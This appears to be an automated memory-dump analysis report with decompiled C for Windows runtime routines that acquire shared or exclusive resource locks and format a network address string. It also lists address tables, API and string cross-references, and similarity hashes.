0x00000000
0x021beb70
0x021beb75
0x021beb7d
0x00000000
0x00000000
0x021beb8c
0x00000000
0x021beb8c
0x02190c96
0x00000000
0x00000000
0x02190ca2
0x02190cac
0x02190cb4
0x00000000
0x00000000
0x02190b44
0x02190b47
0x02190b49
0x00000000
0x00000000
0x02190b4f
0x02190b50
0x00000000
0x00000000
0x02190b56
0x02190b62
0x02190b7c
0x02190bac
0x02190a0f
0x021beaaa
0x00000000
0x021beac4
0x021beac4
0x02190bd0
0x02190bd0
0x02190bd4
0x02190bd9
0x00000000
0x00000000
0x02190bdb
0x02190be0
0x021beb0e
0x02190a1a
0x00000000
0x02190a1a
0x021beb1a
0x021beb1f
0x021beb27
0x00000000
0x00000000
0x021beb36
0x00000000
0x021beb36
0x02190bea
0x00000000
0x00000000
0x02190bf6
0x02190c00
0x02190c03
0x02190c0b
0x00000000
0x02190c0b
0x021beaaa
0x00000000
0x02190a15
0x02190bb6
0x00000000
0x02190bc6
0x02190bc6
0x02190bcb
0x02190c15
0x00000000
0x00000000
0x02190c1d
0x02190c20
0x02190c21
0x02190c24
0x02190c24
0x02190c26
0x00000000
0x02190c26
0x02190bcd
0x00000000
0x02190bcd
0x02190b89
0x02190b89
0x02190b90
0x00000000
0x00000000
0x02190b96
0x00000000
0x02190b96
0x02190a04
0x02190a04
0x02190b9a
0x02190b9a
0x02190b9b
0x02190b9f
0x00000000
0x00000000
0x00000000
0x02190ba5
0x02190ac7
0x02190aca
0x021beacf
0x00000000
0x021beade
0x021beade
0x021beae3
0x00000000
0x00000000
0x021beaf3
0x021beaf6
0x021beaf7
0x021beafe
0x021beb01
0x00000000
0x021beb01
0x021beacf
0x02190ad0
0x02190ad4
0x00000000
0x00000000
0x02190ada
0x02190ae6
0x02190c34
0x00000000
0x02190c47
0x02190c49
0x02190c4a
0x02190c4e
0x02190c51
0x02190c54
0x02190c57
0x02190c5a
0x00000000
0x00000000
0x00000000
0x02190c60
0x02190afb
0x02190afe
0x02190b02
0x02190b05
0x02190b08
0x00000000
0x02190b08
0x02190ae6
0x02190b44
0x021909f8
0x021909f8
0x021909f9
0x00000000
0x00000000
0x021beaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02190BF6
__fassign.LIBCMT ref: 02190CA2

Strings

:, xrefs: 02190BA9
., xrefs: 02190A0C
:, xrefs: 02190AC7

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 5e837f7c536818d30117ca5ff7953943bad3effee9f968f4e864c6a5239fa823
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: A1A19D75D8420EEFCF24CF64C8447BEB7B5BF09309F2484AAD852A7281D734AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02190554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E02190554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022301c0;
									_push(_t144);
									_push(0);
									_t51 = E0214F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02194FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E021A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E021A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E021D217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E021A3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02193915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022301c0;
												_push(_t138);
												_push(0);
												_t58 = E0214F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02194FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E021A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E021A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E021D217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E021A3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02193915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02175384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0214F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02193915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0214F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02193915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0214F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02193915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02175329(_t110, _t138);
																_t69 = E021753A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0219055a
0x0219055d
0x02190563
0x02190566
0x021905d8
0x021905e2
0x021905e5
0x00000000
0x021905e7
0x021905e7
0x021905ea
0x021905f3
0x021905f3
0x02190568
0x02190568
0x02190568
0x02190569
0x02190569
0x02190569
0x0219056b
0x00000000
0x00000000
0x021b217f
0x021b2183
0x021b225b
0x021b225f
0x021b2189
0x021b218c
0x021b218f
0x021b2194
0x021b2199
0x021b219d
0x021b21a0
0x021b21a2
0x021b21ce
0x021b21ce
0x021b21ce
0x021b21d0
0x021b21d6
0x021b21de
0x021b21e2
0x021b21e8
0x021b21e9
0x021b21ec
0x021b21f1
0x021b21f6
0x00000000
0x00000000
0x021b21f8
0x021b21fb
0x021b2206
0x021b220b
0x021b220c
0x021b2217
0x021b2226
0x021b222b
0x021b222c
0x021b222f
0x021b2232
0x021b2235
0x021b2235
0x021b223a
0x021b223f
0x021b2241
0x021b2243
0x021b2248
0x021b2248
0x021b224d
0x021b224f
0x021b2262
0x021b2263
0x021b2268
0x021b2269
0x021b2269
0x021b2269
0x021b226d
0x00000000
0x00000000
0x021b2276
0x021b2279
0x021b227e
0x021b2283
0x021b2287
0x021b228a
0x021b228d
0x021b228f
0x021b22bc
0x021b22bc
0x021b22bc
0x021b22be
0x021b22c4
0x021b22cc
0x021b22d0
0x021b22d6
0x021b22d7
0x021b22da
0x021b22df
0x021b22e4
0x00000000
0x00000000
0x021b22e6
0x021b22e9
0x021b22f4
0x021b22f9
0x021b22fa
0x021b2305
0x021b2314
0x021b2319
0x021b231a
0x021b231d
0x021b2320
0x021b2323
0x021b2323
0x021b2328
0x021b232d
0x021b232f
0x021b2331
0x021b2336
0x021b2336
0x021b233b
0x021b233d
0x021b2350
0x021b2351
0x021b2356
0x021b2359
0x021b2359
0x021b235b
0x021b235d
0x02175367
0x0217536b
0x02175372
0x00000000
0x00000000
0x00000000
0x00000000
0x021b2363
0x021b2363
0x021b2369
0x021b236a
0x021b236c
0x021b2371
0x021b2373
0x00000000
0x021b2379
0x021b2379
0x021b237a
0x021b237f
0x021b237f
0x021b2385
0x021b2386
0x021b2389
0x021b238e
0x021b2390
0x02175378
0x0217537c
0x021b2396
0x021b2396
0x021b2397
0x021b239c
0x021b23a2
0x021b23a3
0x021b23a6
0x021b23ab
0x021b23ad
0x00000000
0x021b23b3
0x021b23b3
0x021b23b4
0x021b23b9
0x021b23ba
0x021b23ba
0x021b23bc
0x021b23bf
0x00000000
0x00000000
0x021a9153
0x021a9158
0x021a915a
0x021a915e
0x021a9160
0x00000000
0x021a9166
0x021a9166
0x021a9171
0x021a9176
0x021a9176
0x00000000
0x021a9160
0x021b23c6
0x021b23ce
0x021b23d7
0x021b23d7
0x021b23ad
0x021b2390
0x021b2373
0x021b233f
0x021b233f
0x00000000
0x021b233f
0x021b2291
0x021b2291
0x021b2293
0x021b2295
0x021b229a
0x021b22a1
0x021b22a3
0x021b22a7
0x021b22a9
0x00000000
0x00000000
0x021b22ab
0x021b22ad
0x021b22af
0x00000000
0x00000000
0x00000000
0x021b22af
0x021b22b1
0x021b22b4
0x021b22b4
0x021b22b6
0x021753be
0x021753be
0x021753be
0x021753c0
0x00000000
0x00000000
0x021753cb
0x021753ce
0x021753d0
0x021753d4
0x021753d6
0x00000000
0x021753d8
0x021753e3
0x021753ea
0x021753ea
0x00000000
0x021753d6
0x00000000
0x00000000
0x00000000
0x00000000
0x021b22b6
0x00000000
0x021b228f
0x021b2349
0x021b234d
0x021b2251
0x021b2251
0x00000000
0x021b2251
0x021b21a4
0x021b21a4
0x021b21a6
0x021b21a8
0x021b21ac
0x021b21b6
0x021b21b8
0x021b21bc
0x021b21be
0x00000000
0x00000000
0x021b21c0
0x021b21c2
0x021b21c4
0x00000000
0x00000000
0x00000000
0x021b21c4
0x021b21c6
0x021b21c6
0x021b21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x021b21c8
0x021b21a2
0x00000000
0x021b2183
0x0219057b
0x0219057d
0x02190581
0x02190583
0x021b2178
0x00000000
0x02190589
0x0219058f
0x0219058f
0x02190583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021B2206

Strings

RTL: Resource at %p, xrefs: 021B221D, 021B230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 021B220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021B22FC
RTL: Re-Waiting, xrefs: 021B223A, 021B2328

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: baf10d5168fb992b306fc9ba8c502d33303d12d43dd578adbf2f4d08b5b105ff
Instruction ID: f8dd30ac46495ff1babf749aa8f3b9a05b7f9ae32f051076e2b4a9ea0805bc12
Opcode Fuzzy Hash: baf10d5168fb992b306fc9ba8c502d33303d12d43dd578adbf2f4d08b5b105ff
Instruction Fuzzy Hash: E5512B75B802116FEB16CE18DC81FA633BAAF88714F214259FD65DF285DB31EC468B90

Uniqueness

Uniqueness Score: -1.00%

Function 021914C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E021914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2232088; // 0x774cf084
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02187707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E021913CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02187707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02187707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02152340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0215E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x021914c0
0x021914cb
0x021914d2
0x021914d6
0x021914da
0x021914de
0x021914e3
0x0219157a
0x0219157a
0x021914f1
0x021914f3
0x021bea0f
0x00000000
0x021bea15
0x00000000
0x021bea15
0x021914f9
0x021914f9
0x021914fe
0x02191504
0x021bea1a
0x021bea1f
0x021bea21
0x021bea22
0x021bea27
0x021bea2a
0x021bea2a
0x02191515
0x02191517
0x0219156d
0x02191572
0x02191575
0x02191575
0x0219151e
0x021bea50
0x021bea55
0x021bea58
0x021bea58
0x0219152e
0x02191531
0x02191533
0x00000000
0x02191535
0x02191541
0x02191549
0x02191549
0x02191533
0x021914f3
0x02191559

APIs

___swprintf_l.LIBCMT ref: 021BEA22

Part of subcall function 021913CB: ___swprintf_l.LIBCMT ref: 0219146B
Part of subcall function 021913CB: ___swprintf_l.LIBCMT ref: 02191490

___swprintf_l.LIBCMT ref: 0219156D

Strings

]:%u, xrefs: 021BEA47
%%%u, xrefs: 02191564

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: bdbb7f21786d5944e2b27ecde58a5193992310a78569d482247ea418048061a5
Instruction ID: f55f77d085f023eaebcb4e3b9cb08b0ea40d8052ef78c492cbd375aaf55a24f2
Opcode Fuzzy Hash: bdbb7f21786d5944e2b27ecde58a5193992310a78569d482247ea418048061a5
Instruction Fuzzy Hash: CA21B17298022AEFEF21EE64CC44AEA73BCAF15704F454551EC5AD3140DB70AA98CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 021753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E021753A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x022301c0;
									_push(_t92);
									_push(0);
									_t37 = E0214F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02194FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E021A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E021A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E021D217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E021A3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02193915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02175384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0214F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02193915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0214F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02193915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0214F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02193915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02175329(_t74, _t92);
													_push(1);
													_t48 = E021753A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x021753ab
0x021753ae
0x021753b1
0x021753b4
0x021753b7
0x021905b6
0x021905c0
0x021905c3
0x00000000
0x021905c9
0x021905c9
0x021905cc
0x021905d5
0x021905d5
0x021753bd
0x021753bd
0x021753bd
0x021753be
0x021753be
0x021753be
0x021753c0
0x00000000
0x00000000
0x021b2269
0x021b226d
0x021b2349
0x021b234d
0x021b2273
0x021b2276
0x021b2279
0x021b227e
0x021b2283
0x021b2287
0x021b228a
0x021b228d
0x021b228f
0x021b22bc
0x021b22bc
0x021b22bc
0x021b22be
0x021b22c4
0x021b22cc
0x021b22d0
0x021b22d6
0x021b22d7
0x021b22da
0x021b22df
0x021b22e4
0x00000000
0x00000000
0x021b22e6
0x021b22e9
0x021b22f4
0x021b22f9
0x021b22fa
0x021b2305
0x021b2314
0x021b2319
0x021b231a
0x021b231d
0x021b2320
0x021b2323
0x021b2323
0x021b2328
0x021b232d
0x021b232f
0x021b2331
0x021b2336
0x021b2336
0x021b233b
0x021b233d
0x021b2350
0x021b2351
0x021b2356
0x021b2359
0x021b2359
0x021b235b
0x021b235d
0x02175367
0x0217536b
0x02175372
0x00000000
0x00000000
0x00000000
0x00000000
0x021b2363
0x021b2363
0x021b2369
0x021b236a
0x021b236c
0x021b2371
0x021b2373
0x00000000
0x021b2379
0x021b2379
0x021b237a
0x021b237f
0x021b237f
0x021b2385
0x021b2386
0x021b2389
0x021b238e
0x021b2390
0x02175378
0x0217537c
0x021b2396
0x021b2396
0x021b2397
0x021b239c
0x021b23a2
0x021b23a3
0x021b23a6
0x021b23ab
0x021b23ad
0x00000000
0x021b23b3
0x021b23b3
0x021b23b4
0x021b23b9
0x021b23ba
0x021b23ba
0x021b23bc
0x021b23bf
0x00000000
0x00000000
0x021a9153
0x021a9158
0x021a915a
0x021a915e
0x021a9160
0x00000000
0x021a9166
0x021a9166
0x021a9171
0x021a9176
0x021a9176
0x00000000
0x021a9160
0x021b23c6
0x021b23cb
0x021b23ce
0x021b23d7
0x021b23d7
0x021b23ad
0x021b2390
0x021b2373
0x021b233f
0x021b233f
0x00000000
0x021b233f
0x021b2291
0x021b2291
0x021b2293
0x021b2295
0x021b229a
0x021b22a1
0x021b22a3
0x021b22a7
0x021b22a9
0x00000000
0x00000000
0x021b22ab
0x021b22ad
0x021b22af
0x00000000
0x00000000
0x00000000
0x021b22af
0x021b22b1
